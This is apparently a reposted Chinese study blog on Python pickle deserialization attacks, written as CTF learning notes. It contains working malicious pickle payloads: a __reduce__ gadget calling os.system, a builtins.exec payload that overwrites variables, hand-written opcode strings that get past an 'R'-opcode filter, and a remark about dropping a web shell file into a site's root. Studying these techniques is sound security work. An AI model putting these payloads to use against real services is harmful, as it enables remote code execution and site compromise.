-----已搬运-------【!总章程!】python反序列化入门学习
目录:
-
- 1.利用__reduce__方法来RCE
-
-
- 代码分析 + 实例熟悉
- 更换指令执行RCE
- 读写文件
- 变量覆盖
- 更换模块名可以执行
- 有了__reduce__之后,正常反序列化代码消失??
- 重磅: 如何手写opcode?
-
- 阅读一段最简单的代码:
-
- 2.当禁止使用reduce的时候,也就是过滤了 R 的时候
-
- 1.全局变量包含:c指令码的妙用
- 3.绕过c指令的module限制:先读入,再篡改,
- 4.不用reduce,也能RCE
- 5.回到这个题上面去了,实践一下
知识来源哦哦:
最最最底层的分析:来自知乎专栏的,也是炅哥推荐的文章
GitHub上的 opcode 指令的含义:
这个挺好,先知社区讲的,由书写和阅读opcode码的相对来说比较详细的讲解,有gif图片教学,好得很
这个是P牛讲的,中间靠后那一段,学了不少,熟练opcode就从这学的
这是一个个人网站的,没看,因该写的不错吧,记录下来了
要手写的话,看这个https://blog.csdn.net/Zero_Adam/article/details/114535044是p0写的,下面是p3写的,不方便看,
1.利用__reduce__方法来RCE
代码分析 + 实例熟悉
最最基本的别忘了,,
python反序列化----本地测试 -----踩坑注意点! 这个夭折了,可以看看那些nb的【附件。。。】
生成二进制码,并且利用 逆向分析工具
# see the nomal Student
payload = pickle.dumps(Student('rxz','G2'))
payload = pickletools.optimize(payload)
print(payload)
pickletools.dis(payload)
这段代码就是练习python反序列化的例子,
import pickle
import os
import pickletools
import base64
class Student():
def __init__(self,name,grade):
self.name = name
self.grade = grade
def __eq__(self, other):
return type(other) is Student and \
self.name == other.name and\
self.grade == other.grade
"""
# see the nomal Student
payload = pickle.dumps(Student('rxz','G2'))
payload = pickletools.optimize(payload)
print(payload)
pickletools.dis(payload)
"""
res = pickle.loads(b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00rxzX\x05\x00\x00\x00gradeX\x02\x00\x00\x00G2ub.')
print(res)
这是正常的 Student 的反序列化的 二进制码
b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00rxzX\x05\x00\x00\x00gradeX\x02\x00\x00\x00G2ub.'
这个是 带有reduce的 student类
reduce实现如下:
def __reduce__(self):
return (os.system,('ls /',))
这是生成的二进制码
b'\x80\x03cposix\nsystem\nX\x04\x00\x00\x00ls /\x85R.'
至于为什么 反序列化 时候,用__reduce__方法就能够执行呢。这个知乎的那篇文章已经讲的很清楚了,这里我只是自己输出一遍,看看自己理解的怎么样:
reduce呢,就是 两个参数,前面一个参数是方法,后面一个参数是一个字符串或者是元组,我们选择元组作为他的参数,也就是前面的那个方法的参数,这样就能够执行这个 方法了
而我们 学习那篇文章,又能知道 在反序列化时, R 操作符,会弹出栈顶两次,假设先弹出a,后后弹出b,那么就会执行b.a这样的方法,刚好和reduce方法一致,
这里我们看一下上面的 恶意的二进制的反序列化字符串:
res = pickle.loads(b'\x80\x03cposix\nsystem\nX\x04\x00\x00\x00ls /\x85R.')
c字符,__posix__.system压入栈,然后 字符串ls /入栈,然后执行 R 指令。
ls /出栈,__posix__.system出栈。执行__posix__.system(ls /)的命令,就执行了RCE了。
这是我牵强附会写的,肯定不对,只是为了顺畅分析而已,还是要看那个知乎文章去。
更换指令执行RCE
然后我们就可以修改任意指令了:
读写文件
这样会在当前py文件目录中生成poc.txt文件,如果这个py文件在网站跟目录里面的话,就可以连接木马了
变量覆盖
这个是正常运行reduce方法产生的序列化字符串,然后贴进去就行了
b"\x80\x03cbuiltins\nexec\nq\x00X\x17\x00\x00\x00key1=b'999'\nkey2=b'666'q\x01\x85q\x02Rq\x03."
更换模块名可以执行
之前是那个什么 posix
有了__reduce__之后,正常反序列化代码消失??
这是正常的 反序列化字符串
b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00rxzX\x05\x00\x00\x00gradeX\x02\x00\x00\x00G2ub.'
这是带有 __reduce__的反序列化字符串
res = pickle.loads(b'\x80\x03cposix\nsystem\nX\x04\x00\x00\x00ls /\x85R.')
可见,很多反序列化的信息都没有了啊,,,
没查出些什么来,就是说python会在序列化的时候调用 reduce 。。
重磅: 如何手写opcode?
阅读一段最简单的代码:
我的猜测是正确的,\x85,\x86,\x87不仅仅是压入一个空元组,而是把相应个数的栈顶元素放入这个元组中,然后将这个非空元组压入栈顶。
见下图:
2.当禁止使用reduce的时候,也就是过滤了 R 的时候
1.全局变量包含:c指令码的妙用
我们先获取一个正常的 序列化 字符串
b'\x80\x03c__main__\nStudent\n)\x81}(X\x05\x00\x00\x00gradeX\x02\x00\x00\x00G2X\x04\x00\x00\x00nameX\x03\x00\x00\x00rxzub.'
然后 用c 指令来进行绕过
这个是用c给代替了的,能够正常反序列化出来Student实例
b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00namecblue\nname\nX\x05\x00\x00\x00gradecblue\ngrade\nub.'
这里用的就是 c 来代替 。从而该改变了 内部的信息
我改了改,改成这个样子了
bb.py
# -*- coding: UTF-8 -*-
import pickle
import os
import pickletools
import base64
class Student():
def __init__(self,name,grade):
self.name = name
self.grade = grade
def __eq__(self, other):
return type(other) is Student and \
self.name == other.name and\
self.grade == other.grade
"""
# see the nomal Student
payload = pickle.dumps(Student('rxz','G2'))
payload = pickletools.optimize(payload)
print(payload)
pickletools.dis(payload)
"""
import blue
def check(data):
if b'R' in data:
print ('no reduce!')
x = pickle.loads(data) # unserializtion
if(x != Student(blue.name,blue.grade)):
print('not equal >_<')
print('wel dome')
# check 里面写我们构造的 恶意的反序列话的 二进制的字符串
check(b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00namecblue\nname\nX\x05\x00\x00\x00gradecblue\ngrade\nub.')
blue.py
name = 'QAQ'
grade = 'G666'
这里用的就是 c 来代替
3.绕过c指令的module限制:先读入,再篡改,
先看一下正常的 序列化什么样子
这个是正常的 反序列化的字符串
b'\x80\x03c__main__\nStudent\n)\x81}(X\x05\x00\x00\x00gradeX\x02\x00\x00\x00G2X\x04\x00\x00\x00nameX\x03\x00\x00\x00rxzub.'
然后尝试和上面的一样,引入 blue 中的那些
这里!!!!!!!!!
修改的这里,我应该是要会手写进去的,而不是会复制粘贴进去
修改成这样:然后放进去,就好了
b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00namecblue\nname\nX\x05\x00\x00\x00gradecblue\ngrade\nub.'
同时成功修改了 name和grade。
贴一下代码把:
没有留备份代码
# -*- coding: UTF-8 -*-
import pickle
import os
import pickletools
import base64
class Student():
def __init__(self,name,grade):
self.name = 'rxz'
self.grade='G2'
"""
# see the nomal Student
payload = pickle.dumps(Student('rxz','G2'))
payload = pickletools.optimize(payload)
print(payload)
pickletools.dis(payload)
"""
import blue
def check(data):
if b'R' in data:
print ('no reduce!')
exit()
x = pickle.loads(data) # unserializtion
if(x != Student(blue.name,blue.grade)):
print('not equal >_<')
exit()
print('wel dome')
exit()
s=b'\x80\x03c__main__\nblue\n}(Vname\nVrua\nVgrade\nVwww\nub0c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00ruaX\x05\x00\x00\x00gradeX\x03\x00\x00\x00wwwub.'
s = pickletools.optimize(s)
pickletools.dis(s)
print(s)
res = pickle.loads(s)
print(res.name,res.grade)
4.不用reduce,也能RCE
这个我将P牛的文章 细细分析了一波,可以看一看。
基本功的第四点:【!牛逼!附件】python反序列化 例题学习 +++ 基本功:手挫OPCODE代码 !!: &&本地复现环境&& 详细解释 P牛 的那个 builtins 绕过沙盒的RCE
5.回到这个题上面去了,实践一下
